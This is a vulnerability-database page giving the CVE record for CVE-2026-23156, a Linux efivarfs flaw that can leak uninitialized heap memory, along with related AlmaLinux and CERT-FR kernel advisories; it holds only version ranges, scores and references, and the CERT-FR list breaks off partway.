Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-23156 (GCVE-0-2026-23156)
Vulnerability from cvelistv5 – Published: 2026-02-14 16:01 – Updated: 2026-05-11 22:01| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2d82e6227ea189c0589e7383a36616ac2a2d248c , < 3960f1754664661a970dc9ebbab44ff93a0b4c42
(git)
Affected: 2d82e6227ea189c0589e7383a36616ac2a2d248c , < 510a16f1c5c1690b33504052bc13fbc2772c23f8 (git) Affected: 2d82e6227ea189c0589e7383a36616ac2a2d248c , < 89b8ca709eeeabcc11ebba64806677873a2787a8 (git) Affected: 2d82e6227ea189c0589e7383a36616ac2a2d248c , < e4e15a0a4403c96d9898d8398f0640421df9cb16 (git) Affected: 2d82e6227ea189c0589e7383a36616ac2a2d248c , < 4b22ec1685ce1fc0d862dcda3225d852fb107995 (git) |
|
| Linux | Linux |
Affected:
6.0
Unaffected: 0 , < 6.0 (semver) Unaffected: 6.1.162 , ≤ 6.1.* (semver) Unaffected: 6.6.123 , ≤ 6.6.* (semver) Unaffected: 6.12.69 , ≤ 6.12.* (semver) Unaffected: 6.18.9 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/efivarfs/vars.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3960f1754664661a970dc9ebbab44ff93a0b4c42",
"status": "affected",
"version": "2d82e6227ea189c0589e7383a36616ac2a2d248c",
"versionType": "git"
},
{
"lessThan": "510a16f1c5c1690b33504052bc13fbc2772c23f8",
"status": "affected",
"version": "2d82e6227ea189c0589e7383a36616ac2a2d248c",
"versionType": "git"
},
{
"lessThan": "89b8ca709eeeabcc11ebba64806677873a2787a8",
"status": "affected",
"version": "2d82e6227ea189c0589e7383a36616ac2a2d248c",
"versionType": "git"
},
{
"lessThan": "e4e15a0a4403c96d9898d8398f0640421df9cb16",
"status": "affected",
"version": "2d82e6227ea189c0589e7383a36616ac2a2d248c",
"versionType": "git"
},
{
"lessThan": "4b22ec1685ce1fc0d862dcda3225d852fb107995",
"status": "affected",
"version": "2d82e6227ea189c0589e7383a36616ac2a2d248c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/efivarfs/vars.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.123",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.69",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.162",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.123",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.69",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.9",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: fix error propagation in efivar_entry_get()\n\nefivar_entry_get() always returns success even if the underlying\n__efivar_entry_get() fails, masking errors.\n\nThis may result in uninitialized heap memory being copied to userspace\nin the efivarfs_file_read() path.\n\nFix it by returning the error from __efivar_entry_get()."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T22:01:17.796Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42"
},
{
"url": "https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8"
},
{
"url": "https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8"
},
{
"url": "https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16"
},
{
"url": "https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995"
}
],
"title": "efivarfs: fix error propagation in efivar_entry_get()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2026-23156",
"datePublished": "2026-02-14T16:01:23.215Z",
"dateReserved": "2026-01-13T15:37:45.978Z",
"dateUpdated": "2026-05-11T22:01:17.796Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-23156",
"date": "2026-05-28",
"epss": "0.00018",
"percentile": "0.04957"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-23156\",\"sourceIdentifier\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"published\":\"2026-02-14T16:15:55.760\",\"lastModified\":\"2026-03-18T14:40:43.860\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In the Linux kernel, the following vulnerability has been resolved:\\n\\nefivarfs: fix error propagation in efivar_entry_get()\\n\\nefivar_entry_get() always returns success even if the underlying\\n__efivar_entry_get() fails, masking errors.\\n\\nThis may result in uninitialized heap memory being copied to userspace\\nin the efivarfs_file_read() path.\\n\\nFix it by returning the error from __efivar_entry_get().\"},{\"lang\":\"es\",\"value\":\"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\\n\\nefivarfs: correcci\u00f3n de la propagaci\u00f3n de errores en efivar_entry_get()\\n\\nefivar_entry_get() siempre devuelve \u00e9xito incluso si la funci\u00f3n subyacente __efivar_entry_get() falla, enmascarando errores.\\n\\nEsto puede resultar en que memoria de pila no inicializada sea copiada al espacio de usuario en la ruta de efivarfs_file_read().\\n\\nSe soluciona devolviendo el error desde __efivar_entry_get().\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.0\",\"versionEndExcluding\":\"6.1.162\",\"matchCriteriaId\":\"83DE4E0F-B87E-49B8-B0C7-D01CE9B22054\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.2\",\"versionEndExcluding\":\"6.6.123\",\"matchCriteriaId\":\"316D8D4E-FE44-4C76-8403-63CAF51EEFC2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.7\",\"versionEndExcluding\":\"6.12.69\",\"matchCriteriaId\":\"3F0D11B0-A3DA-4D8F-89B9-CFD2094EBA37\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"6.13\",\"versionEndExcluding\":\"6.18.9\",\"matchCriteriaId\":\"171CFCB2-8F49-4F9E-8A67-FAC6BF45B5A2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"F71D92C0-C023-48BD-B3B6-70B638EEE298\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"13580667-0A98-40CC-B29F-D12790B91BDB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7\"}]}]}],\"references\":[{\"url\":\"https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]}]}}"
}
}
alsa-2026:4012
Vulnerability from osv_almalinux
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
- kernel: Linux kernel: Use-after-free in device mapper due to race condition in zone reporting (CVE-2025-38141)
- kernel: Linux kernel io_uring: Local privilege escalation, information disclosure, or denial of service via use-after-free (CVE-2025-38106)
- kernel: drm/xe: Make dma-fences compliant with the safe access rules (CVE-2025-38703)
- kernel: Linux kernel: Denial of Service via out-of-bounds read in USB configuration parsing (CVE-2025-39760)
- kernel: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save (CVE-2025-39818)
- kernel: Kernel: Use-after-free in GPIO character device allows privilege escalation or denial of service (CVE-2025-40249)
- kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)
- kernel: macvlan: fix possible UAF in macvlan_forward_source() (CVE-2026-23001)
- kernel: Linux kernel: Denial of Service due to a deadlock in hugetlb folio migration (CVE-2026-23097)
- kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation (CVE-2026-23156)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "kernel-abi-stablelists"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.12.0-124.43.1.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "kernel-doc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.12.0-124.43.1.el10_1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "The kernel packages contain the Linux kernel, the core of any Linux operating system. \n\nSecurity Fix(es): \n\n * kernel: Linux kernel: Use-after-free in device mapper due to race condition in zone reporting (CVE-2025-38141)\n * kernel: Linux kernel io_uring: Local privilege escalation, information disclosure, or denial of service via use-after-free (CVE-2025-38106)\n * kernel: drm/xe: Make dma-fences compliant with the safe access rules (CVE-2025-38703)\n * kernel: Linux kernel: Denial of Service via out-of-bounds read in USB configuration parsing (CVE-2025-39760)\n * kernel: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save (CVE-2025-39818)\n * kernel: Kernel: Use-after-free in GPIO character device allows privilege escalation or denial of service (CVE-2025-40249)\n * kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)\n * kernel: macvlan: fix possible UAF in macvlan_forward_source() (CVE-2026-23001)\n * kernel: Linux kernel: Denial of Service due to a deadlock in hugetlb folio migration (CVE-2026-23097)\n * kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation (CVE-2026-23156)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:4012",
"modified": "2026-03-13T09:41:40Z",
"published": "2026-03-09T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-38106"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-38141"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-38703"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-39760"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-39818"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-40249"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2025-71085"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-23001"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-23097"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-23156"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2376052"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2376077"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2393157"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2394601"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2395797"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2418886"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2429026"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2432664"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2436802"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2439951"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/10/ALSA-2026-4012.html"
}
],
"related": [
"CVE-2025-38141",
"CVE-2025-38106",
"CVE-2025-38703",
"CVE-2025-39760",
"CVE-2025-39818",
"CVE-2025-40249",
"CVE-2025-71085",
"CVE-2026-23001",
"CVE-2026-23097",
"CVE-2026-23156"
],
"summary": "Moderate: kernel security update"
}
CERTFR-2026-AVI-0329
Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, un déni de service et un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "SUSE Linux Micro Extras 6.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-23198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23198"
},
{
"name": "CVE-2026-23202",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23202"
},
{
"name": "CVE-2026-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23167"
},
{
"name": "CVE-2025-68374",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68374"
},
{
"name": "CVE-2026-23129",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23129"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2025-68736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68736"
},
{
"name": "CVE-2025-68283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68283"
},
{
"name": "CVE-2026-23004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23004"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68295",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68295"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2026-23139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23139"
},
{
"name": "CVE-2026-23208",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23208"
},
{
"name": "CVE-2026-23017",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23017"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2026-23179",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23179"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2026-23135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23135"
},
{
"name": "CVE-2026-23119",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23119"
},
{
"name": "CVE-2026-23173",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23173"
},
{
"name": "CVE-2026-23222",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23222"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2026-23229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23229"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2026-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23150"
},
{
"name": "CVE-2026-23163",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23163"
},
{
"name": "CVE-2025-71235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71235"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2026-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23166"
},
{
"name": "CVE-2026-23116",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23116"
},
{
"name": "CVE-2026-23207",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23207"
},
{
"name": "CVE-2025-71200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71200"
},
{
"name": "CVE-2026-23172",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23172"
},
{
"name": "CVE-2026-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23133"
},
{
"name": "CVE-2026-23170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23170"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2025-71188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71188"
},
{
"name": "CVE-2026-23214",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23214"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2026-23178",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23178"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-38224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38224"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71225"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23176"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23146"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2025-71224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71224"
},
{
"name": "CVE-2026-23221",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23221"
},
{
"name": "CVE-2026-23151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23151"
},
{
"name": "CVE-2026-23152",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23152"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71222"
},
{
"name": "CVE-2025-71229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71229"
},
{
"name": "CVE-2026-23213",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23213"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2023-53817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53817"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2026-23121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23121"
},
{
"name": "CVE-2025-39964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39964"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-71236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71236"
},
{
"name": "CVE-2025-71234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71234"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-71232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71232"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23141"
},
{
"name": "CVE-2026-23182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23182"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2026-23095",
